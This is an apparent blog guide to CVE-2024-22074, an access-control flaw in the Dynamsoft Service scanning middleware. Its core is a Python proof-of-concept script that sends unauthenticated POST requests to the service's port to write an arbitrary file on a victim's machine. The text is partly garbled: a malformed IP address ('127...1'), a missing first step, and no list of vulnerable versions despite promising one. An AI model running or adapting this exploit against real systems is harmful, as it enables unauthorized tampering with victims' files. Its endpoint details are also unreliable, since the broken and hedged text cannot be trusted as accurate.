CVE-2024-22074 - Exploiting Incorrect Access Control in Dynamsoft Service (Exclusive Guide)

In early 2024, a critical security vulnerability was discovered in Dynamsoft Service, a tool often used for document scanning in web applications. This vulnerability, tracked as CVE-2024-22074, centers around incorrect access control. Attackers can exploit this flaw to perform unauthorized actions on affected systems.

Let's break it down in simple language, look at which versions are vulnerable, how the exploit works (including sample code), and most importantly, how to protect yourself. We’ll also link to the original sources for those who want the official details.

What is Dynamsoft Service?

Dynamsoft Service is middleware for enabling document scanning (from scanners, webcams, etc.) directly in browsers. It’s popular in businesses, healthcare, and government services for digitizing paperwork.

The Vulnerability: What’s the Problem?

Incorrect Access Control means the software doesn’t properly check if a request is coming from an authorized user. In the case of Dynamsoft Service, it listens on a local port (usually 18622 or 18623) for incoming HTTP requests. Normally, only trusted client apps should connect — but due to this flaw, any local or even remote user can send commands, including scanning, saving, downloading, or even deleting files.

This can lead to sensitive information exposure or system compromise, depending on how the service is used.

Exploiting CVE-2024-22074

Let’s get practical. Here’s how an attacker might exploit this flaw.

Find a PC running a vulnerable version of Dynamsoft Service.

2. The attacker sends crafted HTTP requests to the service’s port, exploiting the lack of proper authorization checks.
3. The attacker can instruct the service to scan documents, save files, or download content from the victim’s machine.

PoC (Proof of Concept) Exploit: Save Arbitrary File

Below is a simple PoC python script that writes a file to the victim’s machine using the vulnerable Dynamsoft endpoint.

import requests

# Change this to the victim's IP if accessible remotely; for local, use 127...1
TARGET = "127...1"
PORT = 18622

# Arbitrary content to write
content = "This is a test file dropped by CVE-2024-22074 exploit."
filename = "C:\\test_cve_22074.txt"

url = f"http://{TARGET}:{PORT}/DynamicWebTWAIN/DWT_SaveAs";

# Payload as expected by the vulnerable endpoint (parameters may change by version)
data = {
    "filename": filename,
    "filedata": content
}

# Send POST request
response = requests.post(url, data=data)

if response.status_code == 200:
    print(f"[+] Successfully wrote file to {filename} on {TARGET}")
else:
    print(f"[-] Failed. HTTP Status: {response.status_code}")

What does this code do?

- It tells the Dynamsoft Service to write a file named C:\test_cve_22074.txt with the specified content.
- Because the vulnerable service does not block unauthorized attempts, the file is created without proper checks.

Real-World Impact

This vulnerability is particularly dangerous in shared environments or if the service port is accessible remotely (via misconfiguration or local malware). Users with physical or remote desktop access, or malware running at a low privilege, can abuse this to steal or alter data.

Restrict Access

Use local firewalls or Windows Defender Firewall rules to only allow trusted applications to connect to Dynamsoft Service ports (usually 18622/18623).

Official References

- NIST NVD - CVE-2024-22074 Entry
- Dynamsoft Service Changelog & Security Advisories

Conclusion

CVE-2024-22074 is a severe and easily-exploitable vulnerability if you’re running the affected versions of Dynamsoft Service. If your organization uses this tool, update immediately and secure the ports.

If you enjoyed this exclusive guide and want more simple, practical breakdowns, follow us for upcoming posts on fresh CVEs and cyber threats. Stay safe and keep your systems patched!

Timeline

Published on: 06/06/2024 21:15:48 UTC
Last modified on: 10/16/2024 15:39:58 UTC